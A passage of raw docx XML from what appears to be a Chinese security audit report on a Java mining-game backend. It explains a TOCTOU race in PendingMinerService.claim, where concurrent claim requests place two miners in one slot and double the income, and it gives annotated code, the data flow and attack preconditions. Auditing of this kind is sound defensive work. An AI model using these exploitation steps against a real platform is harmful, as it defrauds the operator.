        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>持续收益</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：两台矿机均参与哈希率计算，该坑位的挖矿收益持续翻倍，直至平台人工干预。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="677"/>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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="678"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要签名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（需通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 验证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通注册用户，无需管理员权限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680"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.claimPending → PendingMinerService.java.claim → UserMiner.java.setUserId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audit_m157_592_claimPending_ctrl-path6of19.md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：PendingMinerService.java#claim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_31" w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞30：TOCTOU 竞态条件 — 同一坑位重复放入矿机（经济价值翻倍）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="681"/>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：并发 TOCTOU 竞态 — 矿机重复入坑导致挖矿收益翻倍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="682"/>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src/main/java/com/gameBack/mjservice/service/PendingMinerService.java:claim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="683"/>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684"/>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685"/>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：普通已登录用户（需通过签名 + Bearer Token 双重认证）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claim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法中使用了两层数据库锁来防止并发场景下同一坑位被重复占用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByIdAndUserIdForUpdate(recordId, userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— 对特定 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PendingMinerReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行加行锁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userMinerRepository.findByUserIdAndInStorageForUpdate(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— 注释明确说明"串行化该用户格子上矿机操作"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>关键缺陷在第 2 步：当攻击者持有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两条不同的 `recordId` 且使用同一 `slotId`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发起并发请求时：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TX1 与 TX2 各自锁定不同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PendingMinerReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行（无冲突，两者不互相阻塞）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两者同时推进到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorageForUpdate(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 阶段；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="690"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若该用户当前无任何已部署矿机（`inStorage=0` 的行数为 0），该 `SELECT … FOR UPDATE` 返回空结果集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，在 InnoDB REPEATABLE READ 隔离级别下，其所产生的 Gap Lock 存在以下行为：TX2 因 Gap Lock 阻塞后，待 TX1 提交并释放锁，TX2 恢复执行时，后续的坑位占用校验：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userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0).isPresent()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>该查询是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一致性读（非加锁 SELECT）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，读取的是 TX2 事务开始时的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>历史快照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，即 TX1 插入的矿机行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>对 TX2 的一致性读不可见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">。TX2 仍判断坑位为空，继续执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userMinerRepository.save(miner)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，最终在同一坑位成功插入第二台矿机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>直接经济影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：同一坑位存在两台矿机，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerService.recalcUserLevelAndHashRate(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 重新计算时会将两台矿机的算力全部纳入，导致该用户挖矿收益永久翻倍，且每次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balancePushService.pushBalance(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 推送的余额均基于该翻倍算力计算。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p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据流：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>HTTP POST /api/miner/claimPending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.claimPending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PendingMinerService.claim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 坑位检查（一致性读）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userMinerRepository.save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（写入重复矿机）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerService.recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（算力翻倍写入）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balancePushService.pushBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（收益推送）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入口：MinerController.java</w:t>
              <w:br/>
              <w:t>// ClaimPendingForm 可控字段：</w:t>
              <w:br/>
              <w:t>//   Integer slotId;   ← 目标坑位（攻击者两次并发请求均填相同 slotId）</w:t>
              <w:br/>
              <w:t>//   Long recordId;    ← 待领取记录 ID（攻击者两次请求填不同 recordId）</w:t>
              <w:br/>
              <w:t>@PostMapping("/claimPending")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; claimPending(@CurrentUserId Long userId,</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                      @RequestBody ClaimPendingForm form) { // ← HTTP 可控入口</w:t>
              <w:br/>
              <w:t xml:space="preserve">    pendingMinerService.claim(userId, form.getSlotId(), form.getRecordId()); // ← 污点传入 service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞点：PendingMinerService.java — claim 方法</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner claim(Long userId, Integer slotId, Long recordId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    PendingMinerReward record = pendingMinerRewardRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findByIdAndUserIdForUpdate(recordId, userId)  // ← TX1 锁 record[1]，TX2 锁 record[2]，互不阻塞</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(...);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 【并发序列化意图】串行化该用户格子上矿机操作，防并发 claim 同一空坑位</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.findByUserIdAndInStorageForUpdate(userId, 0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 当用户无任何已部署矿机时，返回空结果集，Gap Lock 保护存在不确定性；</w:t>
              <w:br/>
              <w:t xml:space="preserve">    //   TX2 在此处等待 TX1 Gap Lock 释放后继续执行</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if (userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0).isPresent()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ↑ 一致性读（非 FOR UPDATE），读取 TX2 事务开始时的快照；</w:t>
              <w:br/>
              <w:t xml:space="preserve">        //   TX1 提交的矿机插入对 TX2 的此次快照读不可见 ← 漏洞核心</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("该坑位已有矿机");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 两个事务均通过上方检查，均执行到此处</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = new UserMiner();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(slotId);   // ← TX1、TX2 写入相同 slotId</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setInStorage(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    userMinerRepository.sav</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>e(miner); // ← 两台矿机均成功写入同一坑位</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    minerService.recalcUserLevelAndHashRate(userId); // ← 算力按两台矿机计算，经济收益翻倍</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miningBalanceCache.invalidate(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    balancePushService.pushBalance(userId);          // ← 翻倍收益推送到用户余额</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miner;</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前置条件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者持有已登录账号，获得有效 Bearer Token；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="692"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>账号下存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>至少两条</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">有效的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PendingMinerReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status != CLAIMED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>amount &gt;= 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），假设 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 分别为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>R1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>R2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">目标 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
